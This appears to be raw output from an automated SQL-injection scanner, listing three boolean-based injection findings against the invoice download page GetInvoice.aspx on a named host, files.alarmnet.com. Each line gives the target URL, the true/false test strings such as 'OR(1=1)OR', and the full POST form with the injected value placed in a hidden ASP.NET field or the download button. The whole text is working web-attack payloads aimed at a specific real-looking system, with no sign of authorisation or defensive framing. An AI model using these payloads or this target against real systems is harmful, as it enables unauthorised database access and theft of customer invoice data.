Url: http://files.alarmnet.com:80/invoice/invoices/GetInvoice.aspx?, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:'OR(1=1)OR' ; FALSE:'OR(1=2)OR', Payload: {'__VIEWSTATE': '/wEPDwUKLTc1ODcwNDQ3N2RkrBvk/0bTFf5RNb+UBhWMzWCe6qw=', '__VIEWSTATEGENERATOR': "'OR(2=2)OR'", '__EVENTVALIDATION': '/wEWAgKpg4LZAQL0tsu2BVHvlQpLYClpxguGwk8sSPR3oT5m', 'btnDownload': 'Click here to download the file.'}
Url: http://files.alarmnet.com:80/invoice/invoices/GetInvoice.aspx?, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:"OR(1=1)OR" ; FALSE:"OR(1=2)OR", Payload: {'__VIEWSTATE': '/wEPDwUKLTc1ODcwNDQ3N2RkrBvk/0bTFf5RNb+UBhWMzWCe6qw=', '__VIEWSTATEGENERATOR': '"OR(2=2)OR"', '__EVENTVALIDATION': '/wEWAgKpg4LZAQL0tsu2BVHvlQpLYClpxguGwk8sSPR3oT5m', 'btnDownload': 'Click here to download the file.'}
Url: http://files.alarmnet.com:80/invoice/invoices/GetInvoice.aspx?, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:'OR(1=1)OR' ; FALSE:'OR(1=2)OR', Payload: {'__VIEWSTATE': '/wEPDwUKLTc1ODcwNDQ3N2RkrBvk/0bTFf5RNb+UBhWMzWCe6qw=', '__VIEWSTATEGENERATOR': '5EF1687E', '__EVENTVALIDATION': '/wEWAgKpg4LZAQL0tsu2BVHvlQpLYClpxguGwk8sSPR3oT5m', 'btnDownload': "'OR(2=2)OR'"}
